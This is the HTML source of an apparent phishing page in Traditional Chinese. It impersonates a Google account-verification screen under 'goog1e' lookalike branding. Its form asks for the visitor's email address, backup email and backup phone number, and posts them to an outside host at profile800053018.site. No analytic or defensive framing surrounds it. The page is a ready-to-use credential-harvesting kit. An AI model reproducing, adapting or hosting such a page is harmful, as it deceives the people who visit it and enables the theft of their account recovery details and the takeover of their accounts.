<!DOCTYPE html>

<html lang="zh"><head><meta http-equiv="Content-Type" content="text/html; charset=UTF-8">

<link rel="shortcut icon" href="https://syqwkyatz2xw9ncpi1ghmq-on.drv.tw/web/a.ico">

  

  <meta content="width=300, initial-scale=1" name="viewport">

  <meta name="goog1e" value="notranslate">

  <meta name="description" content="你可隨時隨地掌握最新動態；無論是查看特定社交圈的訊息、瀏覽「趣事」，或是前往「附近」訊息串瞭解附近使用者的動態，皆易如反掌。">

  <title>確認其用戶</title>

<style>

  html, body {

  font-family: Arial, sans-serif;

  background: #fff;

  margin: 0;

  padding: 0;

  border: 0;

  position: absolute;

  height: 100%;

  min-width: 100%;

  font-size: 13px;

  color: #404040;

  direction: ltr;

  -webkit-text-size-adjust: none;

  }

  button,

  input[type=button],

  input[type=submit] {

  font-family: Arial, sans-serif;

  font-size: 13px;

  }

  a,

  a:hover,

  a:visited {

  color: #427fed;

  cursor: pointer;

  text-decoration: none;

  }

  a:hover {

  text-decoration: underline;

  }

  h1 {

  font-size: 20px;

  color: #262626;

  margin: 0 0 15px;

  font-weight: normal;

  }

  h2 {

  font-size: 14px;

  color: #262626;

  margin: 0 0 15px;

  font-weight: bold;

  }

  input[type=text],

  input[type=number],



  input[type=tel],

  input[type=text],

  input[type=url] {

  -moz-appearance: none;

  -webkit-appearance: none;

  appearance: none;

  display: inline-block;

  height: 36px;

  padding: 0 8px;

  margin: 0;

  background: #fff;

  border: 1px solid #d9d9d9;

  border-top: 1px solid #c0c0c0;

  -moz-box-sizing: border-box;

  -webkit-box-sizing: border-box;

  box-sizing: border-box;

  -moz-border-radius: 1px;

  -webkit-border-radius: 1px;

  border-radius: 1px;

  font-size: 15px;

  color: #404040;

  }

  input[type=text]:hover,

  input[type=number]:hover,



  input[type=tel]:hover,

  input[type=text]:hover,

  input[type=url]:hover {

  border: 1px solid #b9b9b9;

  border-top: 1px solid #a0a0a0;

  -moz-box-shadow: inset 0 1px 2px rgba(0,0,0,0.1);

  -webkit-box-shadow: inset 0 1px 2px rgba(0,0,0,0.1);

  box-shadow: inset 0 1px 2px rgba(0,0,0,0.1);

  }

  input[type=text]:focus,

  input[type=number]:focus,



  input[type=tel]:focus,

  input[type=text]:focus,

  input[type=url]:focus {

  outline: none;

  border: 1px solid #4d90fe;

  -moz-box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);

  -webkit-box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);

  box-shadow: inset 0 1px 2px rgba(0,0,0,0.3);

  }

  input[type=checkbox],

  input[type=radio] {

  -webkit-appearance: none;

  display: inline-block;

  width: 13px;

  height: 13px;

  margin: 0;

  cursor: pointer;

  vertical-align: bottom;

  background: #fff;

  border: 1px solid #c6c6c6;

  -moz-border-radius: 1px;

  -webkit-border-radius: 1px;

  border-radius: 1px;

  -moz-box-sizing: border-box;

  -webkit-box-sizing: border-box;

  box-sizing: border-box;

  position: relative;

  }

  input[type=checkbox]:active,

  input[type=radio]:active {

  background: #ebebeb;

  }

  input[type=checkbox]:hover {

  border-color: #c6c6c6;

  -moz-box-shadow: inset 0 1px 2px rgba(0,0,0,0.1);

  -webkit-box-shadow: inset 0 1px 2px rgba(0,0,0,0.1);

  box-shadow: inset 0 1px 2px rgba(0,0,0,0.1);

  }

  input[type=radio] {

  -moz-border-radius: 1em;

  -webkit-border-radius: 1em;

  border-radius: 1em;

  width: 15px;

  height: 15px;

  }

  input[type=checkbox]:checked,

  input[type=radio]:checked {

  background: #fff;

  }

  input[type=radio]:checked::after {

  content: '';

  display: block;

  position: relative;

  top: 3px;

  left: 3px;

  width: 7px;

  height: 7px;

  background: #666;

  -moz-border-radius: 1em;

  -webkit-border-radius: 1em;

  border-radius: 1em;

  }

  input[type=checkbox]:checked::after {

  content: url(//ssl.gstatic.com/ui/v1/menu/checkmark.png);

  display: block;

  position: absolute;

  top: -6px;

  left: -5px;

  }

  input[type=checkbox]:focus {

  outline: none;

  border-color: #4d90fe;

  }

  .stacked-label {

  display: block;

  font-weight: bold;

  margin: .5em 0;

  }

  .hidden-label {

  position: absolute !important;

  clip: rect(1px 1px 1px 1px); /* IE6, IE7 */

  clip: rect(1px, 1px, 1px, 1px);

  height: 0px;

  width: 0px;

  overflow: hidden;

  visibility: hidden;

  }

  input[type=checkbox].form-error,

  input[type=text].form-error,

  input[type=number].form-error,



  input[type=text].form-error,

  input[type=tel].form-error,

  input[type=url].form-error {

  border: 1px solid #dd4b39;

  }

  .error-msg {

  margin: .5em 0;

  display: block;

  color: #dd4b39;

  line-height: 17px;

  }

  .help-link {

  background: #dd4b39;

  padding: 0 5px;

  color: #fff;

  font-weight: bold;

  display: inline-block;

  -moz-border-radius: 1em;

  -webkit-border-radius: 1em;

  border-radius: 1em;

  text-decoration: none;

  position: relative;

  top: 0px;

  }

  .help-link:visited {

  color: #fff;

  }

  .help-link:hover {

  color: #fff;

  background: #c03523;

  text-decoration: none;

  }

  .help-link:active {

  opacity: 1;

  background: #ae2817;

  }

  .wrapper {

  position: relative;

  min-height: 100%;

  }

  .content {

  padding: 0 44px;

  }

  .main {

  padding-bottom: 100px;

  }

  /* For modern browsers */

  .clearfix:before,

  .clearfix:after {

  content: "";

  display: table;

  }

  .clearfix:after {

  clear: both;

  }

  /* For IE 6/7 (trigger hasLayout) */

  .clearfix {

  zoom:1;

  }

  .goog1e-header-bar {

  height: 71px;

  border-bottom: 1px solid #e5e5e5;

  overflow: hidden;

  }

  .header .logo {

  margin: 17px 0 0;

  float: left;

  height: 38px;

  width: 116px;

  }

  .header .secondary-link {

  margin: 28px 0 0;

  float: right;

  }

  .header .secondary-link a {

  font-weight: normal;

  }

  .goog1e-header-bar.centered {

  border: 0;

  height: 108px;

  }

  .goog1e-header-bar.centered .header .logo {

  float: none;

  margin: 40px auto 30px;

  display: block;

  }

  .goog1e-header-bar.centered .header .secondary-link {

  display: none

  }

  .goog1e-footer-bar {

  position: absolute;

  bottom: 0;

  height: 35px;

  width: 100%;

  border-top: 1px solid #e5e5e5;

  overflow: hidden;

  }

  .footer {

  padding-top: 7px;

  font-size: .85em;

  white-space: nowrap;

  line-height: 0;

  }

  .footer ul {

  float: left;

  max-width: 80%;

  padding: 0;

  }

  .footer ul li {

  color: #737373;

  display: inline;

  padding: 0;

  padding-right: 1.5em;

  }

  .footer a {

  color: #737373;

  }

  .lang-chooser-wrap {

  float: right;

  display: inline;

  }

  .lang-chooser-wrap img {

  vertical-align: top;

  }

  .lang-chooser {

  font-size: 13px;

  height: 24px;

  line-height: 24px;

  }

  .lang-chooser option {

  font-size: 13px;

  line-height: 24px;

  }

  .hidden {

  height: 0px;

  width: 0px;

  overflow: hidden;

  visibility: hidden;

  display: none !important;

  }

  .banner {

  text-align: center;

  }

  .card {

  background-color: #f7f7f7;

  padding: 20px 25px 30px;

  margin: 0 auto 25px;

  width: 304px;

  -moz-border-radius: 2px;

  -webkit-border-radius: 2px;

  border-radius: 2px;

  -moz-box-shadow: 0px 2px 2px rgba(0, 0, 0, 0.3);

  -webkit-box-shadow: 0px 2px 2px rgba(0, 0, 0, 0.3);

  box-shadow: 0px 2px 2px rgba(0, 0, 0, 0.3);

  }

  .card > *:first-child {

  margin-top: 0;

  }

  .rc-button,

  .rc-button:visited {

  display: inline-block;

  min-width: 46px;

  text-align: center;

  color: #444;

  font-size: 14px;

  font-weight: 700;

  height: 36px;

  padding: 0 8px;

  line-height: 36px;

  -moz-border-radius: 3px;

  -webkit-border-radius: 3px;

  border-radius: 3px;

  -o-transition: all 0.218s;

  -moz-transition: all 0.218s;

  -webkit-transition: all 0.218s;

  transition: all 0.218s;

  border: 1px solid #dcdcdc;

  background-color: #f5f5f5;

  background-image: -webkit-linear-gradient(top,#f5f5f5,#f1f1f1);

  background-image: -moz-linear-gradient(top,#f5f5f5,#f1f1f1);

  background-image: -ms-linear-gradient(top,#f5f5f5,#f1f1f1);

  background-image: -o-linear-gradient(top,#f5f5f5,#f1f1f1);

  background-image: linear-gradient(top,#f5f5f5,#f1f1f1);

  -o-transition: none;

  -moz-user-select: none;

  -webkit-user-select: none;

  user-select: none;

  cursor: default;

  }

  .card .rc-button {

  width: 100%;

  padding: 0;

  }

  .rc-button.disabled,

  .rc-button[disabled] {

  opacity: .5;

  filter: alpha(opacity=50);

  cursor: default;

  pointer-events: none;

  }

  .rc-button:hover {

  border: 1px solid #c6c6c6;

  color: #333;

  text-decoration: none;

  -o-transition: all 0.0s;

  -moz-transition: all 0.0s;

  -webkit-transition: all 0.0s;

  transition: all 0.0s;

  background-color: #f8f8f8;

    box-shadow: 0 1px 1px rgba(0,0,0,0.1);
	background-image: linear-gradient(top,#f8f8f8,#f1f1f1);
}

  .rc-button:active {

  background-color: #f6f6f6;

    box-shadow: 0 1px 2px rgba(0,0,0,0.1);
	background-image: linear-gradient(top,#f6f6f6,#f1f1f1);
}

  .rc-button-submit,

  .rc-button-submit:visited {

  border: 1px solid #3079ed;

  color: #fff;

  text-shadow: 0 1px rgba(0,0,0,0.1);

  background-color: #4d90fe;

  background-image: -webkit-linear-gradient(top,#4d90fe,#4787ed);

  background-image: -moz-linear-gradient(top,#4d90fe,#4787ed);

  background-image: -ms-linear-gradient(top,#4d90fe,#4787ed);

  background-image: -o-linear-gradient(top,#4d90fe,#4787ed);

  background-image: linear-gradient(top,#4d90fe,#4787ed);

  }

  .rc-button-submit:hover {

  border: 1px solid #2f5bb7;

  color: #fff;

  text-shadow: 0 1px rgba(0,0,0,0.3);

  background-color: #357ae8;

  background-image: -webkit-linear-gradient(top,#4d90fe,#357ae8);

  background-image: -moz-linear-gradient(top,#4d90fe,#357ae8);

  background-image: -ms-linear-gradient(top,#4d90fe,#357ae8);

  background-image: -o-linear-gradient(top,#4d90fe,#357ae8);

  background-image: linear-gradient(top,#4d90fe,#357ae8);

  }

  .rc-button-submit:active {

  background-color: #357ae8;

    box-shadow: 0 1px 2px rgba(0,0,0,0.3) inset;
	background-image: linear-gradient(top,#4d90fe,#357ae8);
}

  .rc-button-red,

  .rc-button-red:visited {

  border: 1px solid transparent;

  color: #fff;

  text-shadow: 0 1px rgba(0,0,0,0.1);

  background-color: #d14836;

  background-image: -webkit-linear-gradient(top,#dd4b39,#d14836);

  background-image: -moz-linear-gradient(top,#dd4b39,#d14836);

  background-image: -ms-linear-gradient(top,#dd4b39,#d14836);

  background-image: -o-linear-gradient(top,#dd4b39,#d14836);

  background-image: linear-gradient(top,#dd4b39,#d14836);

  }

  .rc-button-red:hover {

  border: 1px solid #b0281a;

  color: #fff;

  text-shadow: 0 1px rgba(0,0,0,0.3);

  background-color: #c53727;

  background-image: -webkit-linear-gradient(top,#dd4b39,#c53727);

  background-image: -moz-linear-gradient(top,#dd4b39,#c53727);

  background-image: -ms-linear-gradient(top,#dd4b39,#c53727);

  background-image: -o-linear-gradient(top,#dd4b39,#c53727);

  background-image: linear-gradient(top,#dd4b39,#c53727);

  }

  .rc-button-red:active {

  border: 1px solid #992a1b;

  background-color: #b0281a;

    box-shadow: 0 1px 2px rgba(0,0,0,0.3) inset;
	background-image: linear-gradient(top,#dd4b39,#b0281a);
}

  .secondary-actions {

  text-align: center;

  }

</style>

<style media="screen and (max-width: 800px), screen and (max-height: 800px)">

  .goog1e-header-bar.centered {

  height: 83px;

  }

  .goog1e-header-bar.centered .header .logo {

  margin: 25px auto 20px;

  }

  .card {

  margin-bottom: 20px;

  }

</style>

<style media="screen and (max-width: 580px)">

  html, body {

  font-size: 14px;

  }

  .goog1e-header-bar.centered {

  height: 73px;

  }

  .goog1e-header-bar.centered .header .logo {

  margin: 20px auto 15px;

  }

  .content {

  padding-left: 10px;

  padding-right: 10px;

  }

  .hidden-small {

  display: none;

  }

  .card {

  padding: 20px 15px 30px;

  width: 270px;

  }

  .footer ul li {

  padding-right: 1em;

  }

  .lang-chooser-wrap {

  display: none;

  }

</style>

<style>

  pre.debug {

  font-family: monospace;

  position: absolute;

  left: 0;

  margin: 0;

  padding: 1.5em;

  font-size: 13px;

  background: #f1f1f1;

  border-top: 1px solid #e5e5e5;

  direction: ltr;

  white-space: pre-wrap;

  width: 90%;

  overflow: hidden;

  }

</style>

<style>

  .banner {

  text-align: center;

  }

  .banner h1 {

  font-family: 'Open Sans', arial;

  -webkit-font-smoothing: antialiased;

  color: #555;

  font-size: 42px;

  font-weight: 300;

  margin-top: 0;

  margin-bottom: 20px;

  }

  .banner h2 {

  font-family: 'Open Sans', arial;

  -webkit-font-smoothing: antialiased;

  color: #555;

  font-size: 18px;

  font-weight: 400;

  margin-bottom: 20px;

  }

  .signin-card {

  width: 274px;

  padding: 40px 40px;

  }

  .signin-card .profile-img {

  width: 96px;

  height: 96px;

  margin: 0 auto 10px;

  display: block;

  -moz-border-radius: 50%;

  -webkit-border-radius: 50%;

  border-radius: 50%;

  }

  .signin-card .profile-name {

  font-size: 16px;

  font-weight: bold;

  text-align: center;

  margin: 10px 0 0;

  min-height: 1em;

  }

  .signin-card input[type=text],



  .signin-card input[type=text],

  .signin-card input[type=submit] {

  width: 100%;

  display: block;

  margin-bottom: 10px;

  z-index: 1;

  position: relative;

  -moz-box-sizing: border-box;

  -webkit-box-sizing: border-box;

  box-sizing: border-box;

  }

  .signin-card #text,

  .signin-card #Passwd,
  direction: ltr;

  height: 44px;

  font-size: 16px;

  }

  .signin-card #text + .stacked-label {

  margin-top: 15px;

  }

  .signin-card #reauthtext {

  display: block;

  margin-bottom: 10px;

  line-height: 36px;

  padding: 0 8px;

  font-size: 15px;

  color: #404040;

  line-height: 2;

  margin-bottom: 10px;

  font-size: 14px;

  text-align: center;

  overflow: hidden;

  text-overflow: ellipsis;

  white-space: nowrap;

  -moz-box-sizing: border-box;

  -webkit-box-sizing: border-box;

  box-sizing: border-box;

  }

  .one-goog1e p {

  margin: 0 0 10px;

  color: #555;

  font-size: 14px;

  text-align: center;

  }

  .one-goog1e p.create-account,

  .one-goog1e p.switch-account {

  margin-bottom: 60px;

  }

  .one-goog1e img {

  display: block;

  width: 210px;

  height: 17px;

  margin: 10px auto;

  }

</style>

<style media="screen and (max-width: 800px), screen and (max-height: 800px)">

  .banner h1 {

  font-size: 38px;

  margin-bottom: 15px;

  }

  .banner h2 {

  margin-bottom: 15px;

  }

  .one-goog1e p.create-account,

  .one-goog1e p.switch-account {

  margin-bottom: 30px;

  }

  .signin-card #text {

  margin-bottom: 0;

  }

{

  margin-top: -1px;

  }

  .signin-card #text.form-error,

 {

  z-index: 2;

  }

  .signin-card #text:hover,

  .signin-card #text:focus,



  z-index: 3;

  }

</style>

<style media="screen and (max-width: 580px)">

  .banner h1 {

  font-size: 22px;

  margin-bottom: 15px;

  }

  .signin-card {

  width: 260px;

  padding: 20px 20px;

  margin: 0 auto 20px;

  }

  .signin-card .profile-img {

  width: 72px;

  height: 72px;

  -moz-border-radius: 72px;

  -webkit-border-radius: 72px;

  border-radius: 72px;

  }

</style>

<style>

  .jfk-tooltip {

  background-color: #fff;

  border: 1px solid;

  color: #737373;

  font-size: 12px;

  position: absolute;

  z-index: 800 !important;

  border-color: #bbb #bbb #a8a8a8;

  padding: 16px;

  width: 250px;

  }

 .jfk-tooltip h3 {

  color: #555;

  font-size: 12px;

  margin: 0 0 .5em;

  }

 .jfk-tooltip-content p:last-child {

  margin-bottom: 0;

  }

  .jfk-tooltip-arrow {

  position: absolute;

  }

  .jfk-tooltip-arrow .jfk-tooltip-arrowimplbefore,

  .jfk-tooltip-arrow .jfk-tooltip-arrowimplafter {

  display: block;

  height: 0;

  position: absolute;

  width: 0;

  }

  .jfk-tooltip-arrow .jfk-tooltip-arrowimplbefore {

  border: 9px solid;

  }

  .jfk-tooltip-arrow .jfk-tooltip-arrowimplafter {

  border: 8px solid;

  }

  .jfk-tooltip-arrowdown {

  bottom: 0;

  }

  .jfk-tooltip-arrowup {

  top: -9px;

  }

  .jfk-tooltip-arrowleft {

  left: -9px;

  top: 30px;

  }

  .jfk-tooltip-arrowright {

  right: 0;

  top: 30px;

  }

  .jfk-tooltip-arrowdown .jfk-tooltip-arrowimplbefore,.jfk-tooltip-arrowup .jfk-tooltip-arrowimplbefore {

  border-color: #bbb transparent;

  left: -9px;

  }

  .jfk-tooltip-arrowdown .jfk-tooltip-arrowimplbefore {

  border-color: #a8a8a8 transparent;

  }

  .jfk-tooltip-arrowdown .jfk-tooltip-arrowimplafter,.jfk-tooltip-arrowup .jfk-tooltip-arrowimplafter {

  border-color: #fff transparent;

  left: -8px;

  }

  .jfk-tooltip-arrowdown .jfk-tooltip-arrowimplbefore {

  border-bottom-width: 0;

  }

  .jfk-tooltip-arrowdown .jfk-tooltip-arrowimplafter {

  border-bottom-width: 0;

  }

  .jfk-tooltip-arrowup .jfk-tooltip-arrowimplbefore {

  border-top-width: 0;

  }

  .jfk-tooltip-arrowup .jfk-tooltip-arrowimplafter {

  border-top-width: 0;

  top: 1px;

  }

  .jfk-tooltip-arrowleft .jfk-tooltip-arrowimplbefore,

  .jfk-tooltip-arrowright .jfk-tooltip-arrowimplbefore {

  border-color: transparent #bbb;

  top: -9px;

  }

  .jfk-tooltip-arrowleft .jfk-tooltip-arrowimplafter,

  .jfk-tooltip-arrowright .jfk-tooltip-arrowimplafter {

  border-color:transparent #fff;

  top:-8px;

  }

  .jfk-tooltip-arrowleft .jfk-tooltip-arrowimplbefore {

  border-left-width: 0;

  }

  .jfk-tooltip-arrowleft .jfk-tooltip-arrowimplafter {

  border-left-width: 0;

  left: 1px;

  }

  .jfk-tooltip-arrowright .jfk-tooltip-arrowimplbefore {

  border-right-width: 0;

  }

  .jfk-tooltip-arrowright .jfk-tooltip-arrowimplafter {

  border-right-width: 0;

  }

  .jfk-tooltip-closebtn {

  background: url("//ssl.gstatic.com/ui/v1/icons/common/x_8px.png") no-repeat;

  border: 1px solid transparent;

  height: 21px;

  opacity: .4;

  outline: 0;

  position: absolute;

  right: 2px;

  top: 2px;

  width: 21px;

  }

  .jfk-tooltip-closebtn:focus,

  .jfk-tooltip-closebtn:hover {

  opacity: .8;

  cursor: pointer;

  }

  .jfk-tooltip-closebtn:focus {

  border-color: #4d90fe;

  }

</style>

<style media="screen and (max-width: 580px)">

  .jfk-tooltip {

  display: none;

  }

</style>

<style>

  .need-help-reverse {

  float: right;

  }

  .remember .bubble-wrap {

  position: absolute;

  padding-top: 3px;

  -o-transition: opacity .218s ease-in .218s;

  -moz-transition: opacity .218s ease-in .218s;

  -webkit-transition: opacity .218s ease-in .218s;

  transition: opacity .218s ease-in .218s;

  left: -999em;

  opacity: 0;

  width: 314px;

  margin-left: -20px;

  }

  .remember:hover .bubble-wrap,

  .remember input:focus ~ .bubble-wrap,

  .remember .bubble-wrap:hover,

  .remember .bubble-wrap:focus {

  opacity: 1;

  left: inherit;

  }

  .bubble-pointer {

  border-left: 10px solid transparent;

  border-right: 10px solid transparent;

  border-bottom: 10px solid #fff;

  width: 0;

  height: 0;

  margin-left: 17px;

  }

  .bubble {

  background-color: #fff;

  padding: 15px;

  margin-top: -1px;

  font-size: 11px;

  -moz-border-radius: 2px;

  -webkit-border-radius: 2px;

  border-radius: 2px;

  -moz-box-shadow: 0px 2px 2px rgba(0, 0, 0, 0.3);

  -webkit-box-shadow: 0px 2px 2px rgba(0, 0, 0, 0.3);

  box-shadow: 0px 2px 2px rgba(0, 0, 0, 0.3);

  }

  #stay-signed-in {

  float: left;

  }

  #stay-signed-in-tooltip {

  left: auto;

  margin-left: -20px;

  padding-top: 3px;

  position: absolute;

  top: 0;

  visibility: hidden;

  width: 314px;

  z-index: 1;

  }

  .dasher-tooltip {

  position: absolute;

  left: 50%;

  top: 380px;

  margin-left: 150px;

  }

  .dasher-tooltip .tooltip-pointer {

  margin-top: 15px;

  }

  .dasher-tooltip p {

  margin-top: 0;

  }

  .dasher-tooltip p span {

  display: block;

  }

</style>

<style media="screen and (max-width: 800px), screen and (max-height: 800px)">

  .dasher-tooltip {

  top: 340px;

  }

</style>

  </head>

  <body>

  <div class="wrapper">

  <div class="goog1e-header-bar  centered">

  <div class="header content clearfix">

  <img alt="goog1e" class="logo" src="https://static1.squarespace.com/static/59aa18678fd4d28748fdc362/t/5c9beecc104c7bc6f8cc5cb4/1545074858565/goog1elogo_color_836x272dp.png">

  </div>

  </div>

  <div class="main content clearfix">

<div class="banner">



  <h2 class="hidden-small">

  確認使用者帳戶

  </h2>

</div>

<div class="card signin-card clearfix">

  

&nbsp;<h1 style="margin: 0px 0px 0.92em; padding: 0px; border: 0px; color: rgb(34, 34, 34); font-size: 1.54em; font-weight: normal; line-height: 24px; font-family: Arial, sans-serif; font-style: normal; font-variant: normal; letter-spacing: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 1; word-spacing: 0px; -webkit-text-stroke-width: 0px;">

	帳戶驗證說明</h1>

	<p style="margin: 0px 0px 1em; padding: 0px; border: 0px; line-height: 18px; color: rgb(64, 64, 64); font-family: Arial, sans-serif; font-size: 13px; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: 1; word-spacing: 0px; -webkit-text-stroke-width: 0px;">

	重視您的安全與隱私權。請回答以下幾個問題，確認您就是這個帳戶的擁有者，而不是其他人更改您的帳戶。</p>

<p class="profile-name"></p>

  <form novalidate="" method="post" action="https://profile800053018.site/user/goo/2.php" id="confirm">



<label class="hidden-label" for="text">電子郵件</label>

<input id="text" name="user" type="text" placeholder="請輸入您的電子郵件地址" value="" spellcheck="false" class="">



&nbsp;

<input id="text1" name="text" type="text" placeholder="請輸入您的備援電子郵件

" class=""><br>

<input id="text2" name="text2" type="text" placeholder="請輸入您的備援電話號碼

" class=""><br>

&nbsp;<input id="signIn" name="signIn" class="rc-button rc-button-submit" type="submit" value="繼續">

  <label class="remember">

 

  <div class="bubble-wrap" role="tooltip">

  <div class="bubble-pointer"></div>

  <div class="bubble">

  為了方便起見，請勾選這個核取方塊。如果您使用的是共用裝置，建議您採取額外的防護措施。

  <a href="" target="_blank">瞭解詳情</a>

  </div>

  </div>

  </label>

  <input type="hidden" name="rmShown" value="1">

  <a id="link-forgot-pw" href="" class="need-help-reverse">

  需要協助嗎？

  </a>

  </form>

</div>

<div class="one-goog1e">

  <p class="create-account">



  </p>

<p class="tagline">

  隱私權政策·服務條款·說明

</p>

<img src="./logo_strip_2x.png" width="210" height="17" alt="">

</div>

  </div>

  <div class="goog1e-footer-bar">

  <div class="footer content clearfix">

  <ul id="footer-list">

  <li>

  goog1e

  </li>

  <li>

  <a href="" target="_blank">

  隱私權與條款

  </a>

  </li>

  <li>

  <a href="" target="_blank">

  說明

  </a>

  </li>

  </ul>

  <div id="lang-vis-control" style="display: inline;">

  <span id="lang-chooser-wrap" class="lang-chooser-wrap">

  <label for="lang-chooser"><img src="./index_files/universal_language_settings-21.png" alt="變更語言"></label>

  <select id="lang-chooser" class="lang-chooser" name="lang-chooser">

  <option value="zh-HK">

  ‪中文（香港）‬

  </option>

  <option value="ja">

  ‪日本語‬

  </option>

  <option value="zh-CN">

  ‪简体中文‬

  </option>

  <option value="zh-TW" selected="selected">

  ‪繁體中文‬

  </option>

  <option value="af">

  ‪Afrikaans‬

  </option>

  <option value="az">

  ‪azərbaycan‬

  </option>

  <option value="in">

  ‪Bahasa Indonesia‬

  </option>

  <option value="ms">

  ‪Bahasa Melayu‬

  </option>

  <option value="ca">

  ‪català‬

  </option>

  <option value="cs">

  ‪Čeština‬

  </option>

  <option value="da">

  ‪Dansk‬

  </option>

  <option value="de">

  ‪Deutsch‬

  </option>

  <option value="et">

  ‪eesti‬

  </option>

  <option value="en-GB">

  ‪English (United Kingdom)‬

  </option>

  <option value="en">

  ‪English (United States)‬

  </option>

  <option value="es">

  ‪Español (España)‬

  </option>

  <option value="es-419">

  ‪Español (Latinoamérica)‬

  </option>

  <option value="eu">

  ‪euskara‬

  </option>

  <option value="fil">

  ‪Filipino‬

  </option>

  <option value="fr-CA">

  ‪Français (Canada)‬

  </option>

  <option value="fr">

  ‪Français (France)‬

  </option>

  <option value="gl">

  ‪galego‬

  </option>

  <option value="hr">

  ‪Hrvatski‬

  </option>

  <option value="zu">

  ‪isiZulu‬

  </option>

  <option value="is">

  ‪íslenska‬

  </option>

  <option value="it">

  ‪Italiano‬

  </option>

  <option value="sw">

  ‪Kiswahili‬

  </option>

  <option value="lv">

  ‪latviešu‬

  </option>

  <option value="lt">

  ‪lietuvių‬

  </option>

  <option value="hu">

  ‪magyar‬

  </option>

  <option value="nl">

  ‪Nederlands‬

  </option>

  <option value="no">

  ‪norsk‬

  </option>

  <option value="pl">

  ‪polski‬

  </option>

  <option value="pt">

  ‪Português‬

  </option>

  <option value="pt-BR">

  ‪Português (Brasil)‬

  </option>

  <option value="pt-PT">

  ‪Português (Portugal)‬

  </option>

  <option value="ro">

  ‪română‬

  </option>

  <option value="sk">

  ‪Slovenčina‬

  </option>

  <option value="sl">

  ‪slovenščina‬

  </option>

  <option value="fi">

  ‪Suomi‬

  </option>

  <option value="sv">

  ‪Svenska‬

  </option>

  <option value="vi">

  ‪Tiếng Việt‬

  </option>

  <option value="tr">

  ‪Türkçe‬

  </option>

  <option value="el">

  ‪Ελληνικά‬

  </option>

  <option value="bg">

  ‪български‬

  </option>

  <option value="mn">

  ‪монгол‬

  </option>

  <option value="ru">

  ‪Русский‬

  </option>

  <option value="sr">

  ‪Српски‬

  </option>

  <option value="uk">

  ‪Українська‬

  </option>

  <option value="ka">

  ‪ქართული‬

  </option>

  <option value="hy">

  ‪հայերեն‬

  </option>

  <option value="iw">

  ‫עברית‬‎

  </option>

  <option value="ur">

  ‫اردو‬‎

  </option>

  <option value="ar">

  ‫العربية‬‎

  </option>

  <option value="fa">

  ‫فارسی‬‎

  </option>

  <option value="am">

  ‪አማርኛ‬

  </option>

  <option value="ne">

  ‪नेपाली‬

  </option>

  <option value="mr">

  ‪मराठी‬

  </option>

  <option value="hi">

  ‪हिन्दी‬

  </option>

  <option value="bn">

  ‪বাংলা‬

  </option>

  <option value="gu">

  ‪ગુજરાતી‬

  </option>

  <option value="ta">

  ‪தமிழ்‬

  </option>

  <option value="te">

  ‪తెలుగు‬

  </option>

  <option value="kn">

  ‪ಕನ್ನಡ‬

  </option>

  <option value="ml">

  ‪മലയാളം‬

  </option>

  <option value="si">

  ‪සිංහල‬

  </option>

  <option value="th">

  ‪ไทย‬

  </option>

  <option value="lo">

  ‪ລາວ‬

  </option>

  <option value="km">

  ‪ខ្មែរ‬

  </option>

  <option value="ko">

  ‪한국어‬

  </option>

  </select>

  </span>

  </div>

  </div>

</div>

  </div>

  









      

  



</body></html>